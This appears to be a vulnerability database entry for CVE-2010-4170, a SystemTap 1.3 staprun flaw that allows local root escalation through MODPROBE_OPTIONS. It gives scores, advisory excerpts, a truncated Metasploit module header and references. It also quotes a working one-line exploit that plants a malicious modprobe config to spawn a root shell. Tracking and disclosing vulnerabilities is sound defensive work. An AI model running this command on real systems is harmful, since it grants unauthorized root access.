Published: 07/12/2010 Updated: 13/02/2023

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 730

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

The staprun runtime tool in SystemTap 1.3 does not properly clear the environment before executing modprobe, which allows local users to gain privileges by setting the MODPROBE_OPTIONS environment variable to specify a malicious configuration file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
systemtap systemtap 1.3

Debian Bug report logs - #603946 CVE-2010-4170 and CVE-2010-4171 Package: systemtap; Maintainer for systemtap is Ritesh Raj Sarraf <rrs@debianorg>; Source for systemtap is src:systemtap (PTS, buildd, popcon) Reported by: Moritz Muehlenhoff <jmm@debianorg> Date: Thu, 18 Nov 2010 18:42:02 UTC Severity: grave Tags: s ...

Several vulnerabilities were discovered in SystemTap, an instrumentation system for Linux: CVE-2011-2503 It was discovered that a race condition in staprun could lead to privilege escalation CVE-2010-4170 It was discovered that insufficient validation of environment variables in staprun could lead to privilege escalation CVE-2010-41 ...

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf: ...

CVE-2010-4170 printf "install uprobes /bin/sh" > exploitconf; MODPROBE_OPTIONS="-C exploitconf" staprun -u whatever RHEL Advisory: rhnredhatcom/errata/RHSA-2010-0894html ...

This code demonstrates a local privilege escalation vulnerability in systemtap ...

This Metasploit module attempts to gain root privileges by exploiting a vulnerability in the staprun executable included with SystemTap version 13 The staprun executable does not clear environment variables prior to executing modprobe, allowing an arbitrary configuration file to be specified in the MODPROBE_OPTIONS environment variable, resulting ...

CWE-264 http://secunia.com/advisories/42318 http://secunia.com/advisories/42256 http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051122.html http://www.redhat.com/support/errata/RHSA-2010-0894.html http://www.securityfocus.com/bid/44914 http://www.securitytracker.com/id?1024754 http://secunia.com/advisories/42263 http://www.exploit-db.com/exploits/15620 http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051127.html http://sources.redhat.com/ml/systemtap/2010-q4/msg00230.html http://secunia.com/advisories/42306 http://www.redhat.com/support/errata/RHSA-2010-0895.html http://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html http://www.debian.org/security/2011/dsa-2348 http://secunia.com/advisories/46920 https://exchange.xforce.ibmcloud.com/vulnerabilities/63344 http://packetstormsecurity.com/files/152569/SystemTap-1.3-MODPROBE_OPTIONS-Privilege-Escalation.html https://www.exploit-db.com/exploits/46730/http://sources.redhat.com/git/gitweb.cgi?p=systemtap.git%3Ba=commit%3Bh=b7565b41228bea196cefa3a7d43ab67f8f9152e2 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=603946 https://nvd.nist.gov https://www.exploit-db.com/exploits/46730 https://www.debian.org/security/./dsa-2348

CVE-2010-4170

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect